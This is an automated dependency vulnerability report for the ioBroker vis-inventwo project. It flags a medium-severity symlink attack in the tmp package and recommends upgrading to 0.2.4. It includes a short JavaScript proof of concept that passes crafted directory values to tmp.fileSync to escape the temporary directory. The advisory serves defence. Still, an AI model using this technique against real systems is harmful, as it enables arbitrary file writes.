Vulnerability report for inventwo/iobroker.vis-inventwo

Vulnerabilities	1 via 2 paths
Dependencies	296
Source	GitHub
Commit	ef03f1a4

Detailed paths

Introduced through: iobroker.vis-inventwo@inventwo/iobroker.vis-inventwo#ef03f1a4afa62c2d180e2206ad7b40883084c021 › np@10.2.0 › listr-input@0.2.1 › inquirer@7.3.3 › external-editor@3.1.0 › tmp@0.0.33
Introduced through: iobroker.vis-inventwo@inventwo/iobroker.vis-inventwo#ef03f1a4afa62c2d180e2206ad7b40883084c021 › np@10.2.0 › listr-input@0.2.1 › inquirer-autosubmit-prompt@0.2.0 › inquirer@6.5.2 › external-editor@3.1.0 › tmp@0.0.33

Overview

Affected versions of this package are vulnerable to Symlink Attack via the dir parameter. An attacker can cause files or directories to be written to arbitrary locations by supplying a crafted symbolic link that resolves outside the intended temporary directory.

PoC

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

Remediation

Upgrade tmp to version 0.2.4 or higher.

References

GitHub Commit

Vulnerabilities

Dependencies

Source

Commit

Find, fix and prevent vulnerabilities in your code.

medium severity

Symlink Attack

Detailed paths

Overview

PoC

Remediation

References